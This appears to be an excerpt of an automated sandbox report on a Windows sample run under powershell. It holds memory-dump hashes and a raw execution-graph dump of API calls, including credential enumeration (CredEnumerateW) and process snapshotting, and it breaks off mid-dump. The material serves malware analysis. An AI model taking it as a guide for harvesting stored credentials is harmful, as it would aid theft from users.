                                                                                                                                                • Instruction Fuzzy Hash: 88218EFD31430AEBDB398E06D9846B7B7A4BF43651F188076E8048B651C735CA80EBE1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (otq$(otq$(otq$(otq
                                                                                                                                                • API String ID: 0-2682020920
                                                                                                                                                • Opcode ID: 01e3a271fe10b6e78213d22b11b0cfe8254c2c1dc68788b187677616d15dbea6
                                                                                                                                                • Instruction ID: 1a1671cf8e8f77ece748f316b9e34d570f0102a54cf0033049052cbbb692f497
                                                                                                                                                • Opcode Fuzzy Hash: 01e3a271fe10b6e78213d22b11b0cfe8254c2c1dc68788b187677616d15dbea6
                                                                                                                                                • Instruction Fuzzy Hash: AEF137B1748209DFDB358F69C890BAABBA1AF83310F14C07AF8158B291DB35C951D7B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$4'tq$4'tq
                                                                                                                                                • API String ID: 0-3370351057
                                                                                                                                                • Opcode ID: 67631c80193cefc4c66801f4c6e00da3599d5dd2ea779467d2977e784df89012
                                                                                                                                                • Instruction ID: 21be677a40f8e91fb4bbd5ea3f02763ab211e6c7e5427d73fdc8c5492a274dc4
                                                                                                                                                • Opcode Fuzzy Hash: 67631c80193cefc4c66801f4c6e00da3599d5dd2ea779467d2977e784df89012
                                                                                                                                                • Instruction Fuzzy Hash: 69C1A1F0E00205DFEB24DF55C581A6EBBB2BF86705F148429DC05AF744DB36AD829BA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 84"l$84"l$tPtq$tPtq
                                                                                                                                                • API String ID: 0-3214611704
                                                                                                                                                • Opcode ID: 0a26f09757d14297073f847fd7d242a692ddb5069421937c7ee7f13a0324b040
                                                                                                                                                • Instruction ID: 1771a2cdf0f3741f6d724bc55fc0c6e754a2ca97c1d044e87ca951c71ba9d0c1
                                                                                                                                                • Opcode Fuzzy Hash: 0a26f09757d14297073f847fd7d242a692ddb5069421937c7ee7f13a0324b040
                                                                                                                                                • Instruction Fuzzy Hash: 16915EB17042969FCB289B79C490A7AFBA2AF82310F24C07AD9159F391DB31DF41D761
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$XY$l$XY$l
                                                                                                                                                • API String ID: 0-3619297104
                                                                                                                                                • Opcode ID: 75dee26d086cbb1f398c510906e6b0777492b93336027b10ad57c5af0dab6868
                                                                                                                                                • Instruction ID: 48b3d92b6a4c02b2f8638f71e4f8397c4dbc1ed83f60239af2c34433549ab18c
                                                                                                                                                • Opcode Fuzzy Hash: 75dee26d086cbb1f398c510906e6b0777492b93336027b10ad57c5af0dab6868
                                                                                                                                                • Instruction Fuzzy Hash: 347119B170824ACFCB159B79D4846AABBA2AFC7211F24C0BBD845CF251DA35C9C1D7A1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-173548568
                                                                                                                                                • Opcode ID: e6818f3e410bb154a992fc3ba58f3a94106d8de02d1d5277bad9b7417547f368
                                                                                                                                                • Instruction ID: 19394d87bbab70a75b2900e308b8abc8e6e9302f9b27444edec16cf85906c72e
                                                                                                                                                • Opcode Fuzzy Hash: e6818f3e410bb154a992fc3ba58f3a94106d8de02d1d5277bad9b7417547f368
                                                                                                                                                • Instruction Fuzzy Hash: 1C2137B171424EABDB34497E9881B37E79A9BC6211F38803BAA05DB381DD7DC9419320
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$$tq$$tq
                                                                                                                                                • API String ID: 0-3085001694
                                                                                                                                                • Opcode ID: 51ee4d840979fd5dd0fe92e3aaff5c089fe19287189730b70c4697efa9eb55f4
                                                                                                                                                • Instruction ID: b6f6f2b08067887002c00320c2f8305c318b034bbd40ff655f19f07ff3d58b34
                                                                                                                                                • Opcode Fuzzy Hash: 51ee4d840979fd5dd0fe92e3aaff5c089fe19287189730b70c4697efa9eb55f4
                                                                                                                                                • Instruction Fuzzy Hash: 4D0126B170824A5FC72A426D5830366EF729FC3611F2A40BBC501CF386DE688D12C3A6

Execution Graph

Execution Coverage: 5.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 74

[Execution graph rendered as an image in the original report; only its node and edge dump survived extraction. The nodes are function addresses in the 0x401000-0x447000 range, with the API each node calls. Recoverable from the dump: a C runtime startup routine at 0x4466f4 (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __wgetmainargs, GetStartupInfoW, exit, _cexit) that hands off to a WinMain-style routine at 0x41276d, which resolves imports (LoadLibraryW, GetProcAddress, FreeLibrary, MessageBoxW, SetErrorMode, EnumResourceTypesW), calls CoInitialize, registers a window class and creates a window (RegisterClassW, CreateWindowExW, ShowWindow, UpdateWindow, LoadAcceleratorsW) and then runs a GetMessageW / TranslateAcceleratorW / IsDialogMessageW / TranslateMessage / DispatchMessageW message loop before CoUninitialize. Other APIs named in the dump: memcpy, memset, malloc, free, wcscpy, wcscat, wcsncat, wcslen, wcsrchr, _wcsicmp, GetSystemDirectoryW, GetModuleFileNameW, GetModuleHandleW, LoadIconW, CreateFontIndirectW, DeleteObject and the MSVC operator new/delete stubs ??2@YAPAXI and ??3@YAXPAX. The dump ends truncated at node 0x44db70.]
37918->37938 37922 40dbfd 37941 4447d9 37922->37941 37925 40dc34 wcscpy wcscpy 37967 40d6f5 37925->37967 37926 40dc1f wcscpy 37926->37925 37929 40d6f5 3 API calls 37930 40dc73 37929->37930 37931 40d6f5 3 API calls 37930->37931 37932 40dc89 37931->37932 37933 40d6f5 3 API calls 37932->37933 37934 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37933->37934 37973 40da80 37934->37973 37937->37915 37939 40dbb4 memset memset 37938->37939 37940 409bca GetModuleFileNameW 37939->37940 37940->37922 37942 4447f4 37941->37942 37943 40dc1b 37942->37943 37944 444807 ??2@YAPAXI 37942->37944 37943->37925 37943->37926 37945 44481f 37944->37945 37946 444873 _snwprintf 37945->37946 37947 4448ab wcscpy 37945->37947 37980 44474a 8 API calls 37946->37980 37949 4448bb 37947->37949 37981 44474a 8 API calls 37949->37981 37951 4448a7 37951->37947 37951->37949 37952 4448cd 37982 44474a 8 API calls 37952->37982 37954 4448e2 37983 44474a 8 API calls 37954->37983 37956 4448f7 37984 44474a 8 API calls 37956->37984 37958 44490c 37985 44474a 8 API calls 37958->37985 37960 444921 37986 44474a 8 API calls 37960->37986 37962 444936 37987 44474a 8 API calls 37962->37987 37964 44494b 37988 44474a 8 API calls 37964->37988 37966 444960 ??3@YAXPAX 37966->37943 37968 44db70 37967->37968 37969 40d702 memset GetPrivateProfileStringW 37968->37969 37970 40d752 37969->37970 37971 40d75c WritePrivateProfileStringW 37969->37971 37970->37971 37972 40d758 37970->37972 37971->37972 37972->37929 37974 44db70 37973->37974 37975 40da8d memset 37974->37975 37976 40daac LoadStringW 37975->37976 37977 40dac6 37976->37977 37977->37976 37979 40dade 37977->37979 37989 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37977->37989 37979->37765 37980->37951 37981->37952 37982->37954 37983->37956 37984->37958 37985->37960 37986->37962 37987->37964 37988->37966 37989->37977 38000 409b98 GetFileAttributesW 37990->38000 37992 40daea 37993 40daef wcscpy wcscpy GetPrivateProfileIntW 37992->37993 
37999 40db63 37992->37999 38001 40d65d GetPrivateProfileStringW 37993->38001 37995 40db3e 38002 40d65d GetPrivateProfileStringW 37995->38002 37997 40db4f 38003 40d65d GetPrivateProfileStringW 37997->38003 37999->37767 38000->37992 38001->37995 38002->37997 38003->37999 38039 40eaff 38004->38039 38008 411ae2 memset 38007->38008 38009 411b8f 38007->38009 38080 409bca GetModuleFileNameW 38008->38080 38021 411a8b 38009->38021 38011 411b0a wcsrchr 38012 411b22 wcscat 38011->38012 38013 411b1f 38011->38013 38081 414770 wcscpy wcscpy wcscpy CloseHandle 38012->38081 38013->38012 38015 411b67 38082 402afb 38015->38082 38019 411b7f 38138 40ea13 SendMessageW memset SendMessageW 38019->38138 38022 402afb 27 API calls 38021->38022 38023 411ac0 38022->38023 38024 4110dc 38023->38024 38025 41113e 38024->38025 38030 4110f0 38024->38030 38163 40969c LoadCursorW SetCursor 38025->38163 38027 411143 38164 444a54 38027->38164 38167 4032b4 38027->38167 38028 4110f7 _wcsicmp 38028->38030 38029 411157 38031 40ada2 _wcsicmp 38029->38031 38030->38025 38030->38028 38185 410c46 10 API calls 38030->38185 38034 411167 38031->38034 38032 4111af 38034->38032 38035 4111a6 qsort 38034->38035 38035->38032 38038->37848 38040 40eb10 38039->38040 38053 40e8e0 38040->38053 38043 40eb6c memcpy memcpy 38044 40ebe1 38043->38044 38045 40ebb7 38043->38045 38044->38043 38046 40ebf2 ??2@YAPAXI ??2@YAPAXI 38044->38046 38045->38044 38050 40d134 16 API calls 38045->38050 38047 40ec2e ??2@YAPAXI 38046->38047 38049 40ec65 38046->38049 38047->38049 38063 40ea7f 38049->38063 38050->38045 38052 402f49 38052->37848 38054 40e8f2 38053->38054 38055 40e8eb ??3@YAXPAX 38053->38055 38056 40e900 38054->38056 38057 40e8f9 ??3@YAXPAX 38054->38057 38055->38054 38058 40e911 38056->38058 38059 40e90a ??3@YAXPAX 38056->38059 38057->38056 38060 40e931 ??2@YAPAXI ??2@YAPAXI 38058->38060 38061 40e921 ??3@YAXPAX 38058->38061 38062 40e92a ??3@YAXPAX 38058->38062 38059->38058 38060->38043 38061->38062 38062->38060 38064 40aa04 free 
38063->38064 38065 40ea88 38064->38065 38066 40aa04 free 38065->38066 38067 40ea90 38066->38067 38068 40aa04 free 38067->38068 38069 40ea98 38068->38069 38070 40aa04 free 38069->38070 38071 40eaa0 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eab3 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40eabd 38074->38075 38076 40a9ce 4 API calls 38075->38076 38077 40eac7 38076->38077 38078 40a9ce 4 API calls 38077->38078 38079 40ead1 38078->38079 38079->38052 38080->38011 38081->38015 38139 40b2cc 38082->38139 38084 402b0a 38085 40b2cc 27 API calls 38084->38085 38086 402b23 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b3a 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b54 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b6b 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402b82 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b99 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bb0 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bc7 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402bde 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402bf5 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c0c 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c23 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c3a 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c51 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c68 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c7f 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c99 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cb3 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402cd5 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402cf0 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d0b 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d26 38127->38128 38129 40b2cc 27 API calls 
38128->38129 38130 402d3e 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d59 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d78 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d93 38135->38136 38137 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38136->38137 38137->38019 38138->38009 38142 40b58d 38139->38142 38141 40b2d1 38141->38084 38143 40b5a4 GetModuleHandleW FindResourceW 38142->38143 38144 40b62e 38142->38144 38145 40b5c2 LoadResource 38143->38145 38147 40b5e7 38143->38147 38144->38141 38146 40b5d0 SizeofResource LockResource 38145->38146 38145->38147 38146->38147 38147->38144 38155 40afcf 38147->38155 38149 40b608 memcpy 38158 40b4d3 memcpy 38149->38158 38151 40b61e 38159 40b3c1 18 API calls 38151->38159 38153 40b626 38160 40b04b 38153->38160 38156 40b04b ??3@YAXPAX 38155->38156 38157 40afd7 ??2@YAPAXI 38156->38157 38157->38149 38158->38151 38159->38153 38161 40b051 ??3@YAXPAX 38160->38161 38162 40b05f 38160->38162 38161->38162 38162->38144 38163->38027 38165 444a64 FreeLibrary 38164->38165 38166 444a83 38164->38166 38165->38166 38166->38029 38168 4032c4 38167->38168 38169 40b633 free 38168->38169 38170 403316 38169->38170 38186 44553b 38170->38186 38174 403480 38384 40368c 15 API calls 38174->38384 38176 403489 38177 40b633 free 38176->38177 38178 403495 38177->38178 38178->38029 38179 4033a9 memset memcpy 38180 4033ec wcscmp 38179->38180 38181 40333c 38179->38181 38180->38181 38181->38174 38181->38179 38181->38180 38382 4028e7 11 API calls 38181->38382 38383 40f508 6 API calls 38181->38383 38183 403421 _wcsicmp 38183->38181 38185->38030 38187 445548 38186->38187 38188 445599 38187->38188 38385 40c768 38187->38385 38190 4455a8 memset 38188->38190 38271 4457f2 38188->38271 38468 403988 38190->38468 38196 4458aa 38198 44594a 38196->38198 38199 4458bb memset memset 38196->38199 38197 445672 38479 403fbe memset memset memset memset memset 38197->38479 38201 4459ed 38198->38201 
38202 44595e memset memset 38198->38202 38204 414c2e 14 API calls 38199->38204 38212 445a00 memset memset 38201->38212 38213 445b22 38201->38213 38208 414c2e 14 API calls 38202->38208 38203 4455e5 38203->38197 38216 44560f 38203->38216 38209 4458f9 38204->38209 38205 44557a 38210 44558c 38205->38210 38663 4136c0 CoTaskMemFree 38205->38663 38206 445854 38206->38196 38593 403c9c memset memset memset memset memset 38206->38593 38214 44599c 38208->38214 38215 40b2cc 27 API calls 38209->38215 38452 444b06 38210->38452 38616 414c2e 38212->38616 38219 445bca 38213->38219 38220 445b38 memset memset memset 38213->38220 38226 40b2cc 27 API calls 38214->38226 38227 445909 38215->38227 38229 4087b3 337 API calls 38216->38229 38218 445849 38679 40b1ab free free 38218->38679 38228 445c8b memset memset 38219->38228 38284 445cf0 38219->38284 38232 445bd4 38220->38232 38233 445b98 38220->38233 38234 4459ac 38226->38234 38243 409d1f 6 API calls 38227->38243 38235 414c2e 14 API calls 38228->38235 38244 445621 38229->38244 38230 445585 38664 41366b FreeLibrary 38230->38664 38231 44589f 38680 40b1ab free free 38231->38680 38241 414c2e 14 API calls 38232->38241 38233->38232 38237 445ba2 38233->38237 38246 409d1f 6 API calls 38234->38246 38247 445cc9 38235->38247 38750 4099c6 wcslen 38237->38750 38238 4456b2 38667 40b1ab free free 38238->38667 38239 40b2cc 27 API calls 38250 445a4f 38239->38250 38252 445be2 38241->38252 38242 403335 38381 4452e5 45 API calls 38242->38381 38255 445919 38243->38255 38665 4454bf 20 API calls 38244->38665 38245 445823 38245->38218 38264 4087b3 337 API calls 38245->38264 38257 4459bc 38246->38257 38258 409d1f 6 API calls 38247->38258 38248 445879 38248->38231 38268 4087b3 337 API calls 38248->38268 38629 409d1f wcslen wcslen 38250->38629 38262 40b2cc 27 API calls 38252->38262 38253 445d3d 38282 40b2cc 27 API calls 38253->38282 38254 445d88 memset memset memset 38256 414c2e 14 API calls 38254->38256 38681 409b98 GetFileAttributesW 38255->38681 38265 445dde 
38256->38265 38746 409b98 GetFileAttributesW 38257->38746 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38260 445680 38260->38238 38502 4087b3 memset 38260->38502 38272 445bf3 38262->38272 38264->38245 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38248 38271->38206 38570 403e2d memset memset memset memset memset 38271->38570 38281 409d1f 6 API calls 38272->38281 38273 445928 38273->38198 38682 40b6ef 38273->38682 38283 445def 38275->38283 38276 4459cb 38276->38201 38294 40b6ef 249 API calls 38276->38294 38280 40b2cc 27 API calls 38286 445a94 38280->38286 38288 445c07 38281->38288 38289 445d54 _wcsicmp 38282->38289 38292 409d1f 6 API calls 38283->38292 38284->38242 38284->38253 38284->38254 38285 445389 255 API calls 38285->38219 38634 40ae18 38286->38634 38287 44566d 38287->38271 38553 413d4c 38287->38553 38297 445389 255 API calls 38288->38297 38298 445d71 38289->38298 38359 445d67 38289->38359 38291 445665 38666 40b1ab free free 38291->38666 38300 445e03 38292->38300 38294->38201 38302 445c17 38297->38302 38771 445093 23 API calls 38298->38771 38299 44563c 38299->38291 38304 4087b3 337 API calls 38299->38304 38772 409b98 GetFileAttributesW 38300->38772 38301 4456d8 38307 40b2cc 27 API calls 38301->38307 38308 40b2cc 27 API calls 38302->38308 38304->38299 38306 40b6ef 249 API calls 38306->38242 38312 4456e2 38307->38312 38313 445c23 38308->38313 38309 445d83 38309->38242 38311 445e12 38317 445e6b 38311->38317 38321 40b2cc 27 API calls 38311->38321 38668 413fa6 _wcsicmp _wcsicmp 38312->38668 38315 409d1f 6 API calls 38313->38315 38319 445c37 38315->38319 38316 445b17 38747 40aebe 38316->38747 38774 445093 23 API calls 38317->38774 38318 4456eb 38324 4456fd memset memset memset memset 38318->38324 38325 4457ea 38318->38325 38326 445389 255 API calls 38319->38326 38328 445e33 38321->38328 38669 409c70 wcscpy wcsrchr 38324->38669 38672 413d29 38325->38672 38327 445c47 38326->38327 38333 40b2cc 27 
API calls 38327->38333 38334 409d1f 6 API calls 38328->38334 38330 445e7e 38335 445f67 38330->38335 38338 445c53 38333->38338 38339 445e47 38334->38339 38340 40b2cc 27 API calls 38335->38340 38336 445ab2 memset 38341 40b2cc 27 API calls 38336->38341 38337 409c70 2 API calls 38342 44577e 38337->38342 38343 409d1f 6 API calls 38338->38343 38773 409b98 GetFileAttributesW 38339->38773 38345 445f73 38340->38345 38346 445aa1 38341->38346 38347 409c70 2 API calls 38342->38347 38348 445c67 38343->38348 38350 409d1f 6 API calls 38345->38350 38346->38316 38346->38336 38351 409d1f 6 API calls 38346->38351 38641 40add4 38346->38641 38646 445389 38346->38646 38655 40ae51 38346->38655 38352 44578d 38347->38352 38353 445389 255 API calls 38348->38353 38349 445e56 38349->38317 38356 445e83 memset 38349->38356 38354 445f87 38350->38354 38351->38346 38352->38325 38358 40b2cc 27 API calls 38352->38358 38353->38219 38777 409b98 GetFileAttributesW 38354->38777 38360 40b2cc 27 API calls 38356->38360 38361 4457a8 38358->38361 38359->38242 38359->38306 38362 445eab 38360->38362 38363 409d1f 6 API calls 38361->38363 38364 409d1f 6 API calls 38362->38364 38365 4457b8 38363->38365 38366 445ebf 38364->38366 38671 409b98 GetFileAttributesW 38365->38671 38368 40ae18 9 API calls 38366->38368 38376 445ef5 38368->38376 38369 4457c7 38369->38325 38371 4087b3 337 API calls 38369->38371 38370 40ae51 9 API calls 38370->38376 38371->38325 38372 445f5c 38373 40aebe FindClose 38372->38373 38373->38335 38374 40add4 2 API calls 38374->38376 38375 40b2cc 27 API calls 38375->38376 38376->38370 38376->38372 38376->38374 38376->38375 38377 409d1f 6 API calls 38376->38377 38379 445f3a 38376->38379 38775 409b98 GetFileAttributesW 38376->38775 38377->38376 38776 445093 23 API calls 38379->38776 38381->38181 38382->38183 38383->38181 38384->38176 38386 40c775 38385->38386 38778 40b1ab free free 38386->38778 38388 40c788 38779 40b1ab free free 38388->38779 38390 40c790 38780 40b1ab free free 38390->38780 38392 
40c798 38393 40aa04 free 38392->38393 38394 40c7a0 38393->38394 38781 40c274 memset 38394->38781 38399 40a8ab 9 API calls 38400 40c7c3 38399->38400 38401 40a8ab 9 API calls 38400->38401 38402 40c7d0 38401->38402 38810 40c3c3 38402->38810 38406 40c877 38415 40bdb0 38406->38415 38407 40c86c 38836 4053fe 39 API calls 38407->38836 38410 40c813 _wcslwr 38834 40c634 49 API calls 38410->38834 38412 40c829 wcslen 38413 40c7e5 38412->38413 38413->38406 38413->38407 38833 40a706 wcslen memcpy 38413->38833 38835 40c634 49 API calls 38413->38835 39021 404363 38415->39021 38418 40bf5d 39041 40440c 38418->39041 38420 40bdee 38420->38418 38423 40b2cc 27 API calls 38420->38423 38421 40bddf CredEnumerateW 38421->38420 38424 40be02 wcslen 38423->38424 38424->38418 38431 40be1e 38424->38431 38425 40be26 wcsncmp 38425->38431 38428 40be7d memset 38429 40bea7 memcpy 38428->38429 38428->38431 38430 40bf11 wcschr 38429->38430 38429->38431 38430->38431 38431->38418 38431->38425 38431->38428 38431->38429 38431->38430 38432 40b2cc 27 API calls 38431->38432 38434 40bf43 LocalFree 38431->38434 39044 40bd5d 28 API calls 38431->39044 39045 404423 38431->39045 38433 40bef6 _wcsnicmp 38432->38433 38433->38430 38433->38431 38434->38431 38435 4135f7 39058 4135e0 38435->39058 38438 40b2cc 27 API calls 38439 41360d 38438->38439 38440 40a804 8 API calls 38439->38440 38441 413613 38440->38441 38442 41361b 38441->38442 38443 41363e 38441->38443 38444 40b273 27 API calls 38442->38444 38445 4135e0 FreeLibrary 38443->38445 38446 413625 GetProcAddress 38444->38446 38447 413643 38445->38447 38446->38443 38448 413648 38446->38448 38447->38205 38449 413658 38448->38449 38450 4135e0 FreeLibrary 38448->38450 38449->38205 38451 413666 38450->38451 38451->38205 39061 4449b9 38452->39061 38455 4449b9 42 API calls 38457 444b4b 38455->38457 38456 444c15 38459 4449b9 42 API calls 38456->38459 38457->38456 39082 444972 GetVersionExW 38457->39082 38460 444c1f 38459->38460 38460->38188 38461 444b99 memcmp 38466 444b8c 
38461->38466 38462 444c0b 39086 444a85 42 API calls 38462->39086 38466->38461 38466->38462 39083 444aa5 42 API calls 38466->39083 39084 40a7a0 GetVersionExW 38466->39084 39085 444a85 42 API calls 38466->39085 38469 40399d 38468->38469 39087 403a16 38469->39087 38471 403a09 39101 40b1ab free free 38471->39101 38473 403a12 wcsrchr 38473->38203 38474 4039a3 38474->38471 38477 4039f4 38474->38477 39098 40a02c CreateFileW 38474->39098 38477->38471 38478 4099c6 2 API calls 38477->38478 38478->38471 38480 414c2e 14 API calls 38479->38480 38481 404048 38480->38481 38482 414c2e 14 API calls 38481->38482 38483 404056 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 404073 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40408e 38486->38487 38488 409d1f 6 API calls 38487->38488 38489 4040a6 38488->38489 38490 403af5 20 API calls 38489->38490 38491 4040ba 38490->38491 38492 403af5 20 API calls 38491->38492 38493 4040cb 38492->38493 39128 40414f memset 38493->39128 38495 404140 39142 40b1ab free free 38495->39142 38497 4040ec memset 38500 4040e0 38497->38500 38498 404148 38498->38260 38499 4099c6 2 API calls 38499->38500 38500->38495 38500->38497 38500->38499 38501 40a8ab 9 API calls 38500->38501 38501->38500 39155 40a6e6 WideCharToMultiByte 38502->39155 38504 4087ed 39156 4095d9 memset 38504->39156 38507 408809 memset memset memset memset memset 38508 40b2cc 27 API calls 38507->38508 38509 4088a1 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088b1 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088c0 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 4088d0 38514->38515 38516 40b2cc 27 API calls 38515->38516 38517 4088df 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 4088ef 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 4088fe 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 40890e 38522->38523 38524 40b2cc 27 API calls 38523->38524 38525 40891d 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 
40892d 38526->38527 39175 409b98 GetFileAttributesW 38527->39175 38529 40893e 38530 408943 38529->38530 38531 408958 38529->38531 39176 407fdf 75 API calls 38530->39176 39177 409b98 GetFileAttributesW 38531->39177 38534 408953 38534->38260 38535 408964 38536 408969 38535->38536 38537 40897b 38535->38537 39178 4082c7 198 API calls 38536->39178 39179 409b98 GetFileAttributesW 38537->39179 38540 408987 38541 4089a1 38540->38541 38542 40898c 38540->38542 39181 409b98 GetFileAttributesW 38541->39181 38554 40b633 free 38553->38554 38555 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38554->38555 38556 413f00 Process32NextW 38555->38556 38557 413da5 OpenProcess 38556->38557 38558 413f17 CloseHandle 38556->38558 38559 413eb0 38557->38559 38560 413df3 memset 38557->38560 38558->38301 38559->38556 38562 413ebf free 38559->38562 38563 4099f4 3 API calls 38559->38563 39445 413f27 38560->39445 38562->38559 38563->38559 38564 413e37 GetModuleHandleW 38566 413e46 GetProcAddress 38564->38566 38567 413e1f 38564->38567 38566->38567 38567->38564 39450 413959 38567->39450 39466 413ca4 38567->39466 38569 413ea2 CloseHandle 38569->38559 38571 414c2e 14 API calls 38570->38571 38572 403eb7 38571->38572 38573 414c2e 14 API calls 38572->38573 38574 403ec5 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403ee2 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403efd 38577->38578 38579 409d1f 6 API calls 38578->38579 38580 403f15 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f29 38581->38582 38583 403af5 20 API calls 38582->38583 38584 403f3a 38583->38584 38585 40414f 33 API calls 38584->38585 38591 403f4f 38585->38591 38586 403faf 39480 40b1ab free free 38586->39480 38588 403f5b memset 38588->38591 38589 403fb7 38589->38245 38590 4099c6 2 API calls 38590->38591 38591->38586 38591->38588 38591->38590 38592 40a8ab 9 API calls 38591->38592 38592->38591 38594 414c2e 14 API calls 38593->38594 38595 403d26 38594->38595 38596 414c2e 14 API calls 38595->38596 
38597 403d34 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d51 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d6c 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 403d84 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403d98 38604->38605 38606 403af5 20 API calls 38605->38606 38607 403da9 38606->38607 38608 40414f 33 API calls 38607->38608 38609 403dbe 38608->38609 38610 403e1e 38609->38610 38611 403dca memset 38609->38611 38614 4099c6 2 API calls 38609->38614 38615 40a8ab 9 API calls 38609->38615 39481 40b1ab free free 38610->39481 38611->38609 38613 403e26 38613->38248 38614->38609 38615->38609 38617 414b81 9 API calls 38616->38617 38618 414c40 38617->38618 38619 414c73 memset 38618->38619 39482 409cea 38618->39482 38623 414c94 38619->38623 38622 414c64 38622->38239 38624 414cf4 wcscpy 38623->38624 39485 414bb0 wcscpy 38623->39485 38624->38622 38626 414cd2 39486 4145ac RegQueryValueExW 38626->39486 38628 414ce9 38628->38624 38630 409d62 38629->38630 38631 409d43 wcscpy 38629->38631 38630->38280 38632 409719 2 API calls 38631->38632 38633 409d51 wcscat 38632->38633 38633->38630 38635 40aebe FindClose 38634->38635 38636 40ae21 38635->38636 38637 4099c6 2 API calls 38636->38637 38638 40ae35 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40ae49 38639->38640 38640->38346 38642 40ade0 38641->38642 38645 40ae0f 38641->38645 38643 40ade7 wcscmp 38642->38643 38642->38645 38644 40adfe wcscmp 38643->38644 38643->38645 38644->38645 38645->38346 38647 40ae18 9 API calls 38646->38647 38653 4453c4 38647->38653 38648 40ae51 9 API calls 38648->38653 38649 4453f3 38651 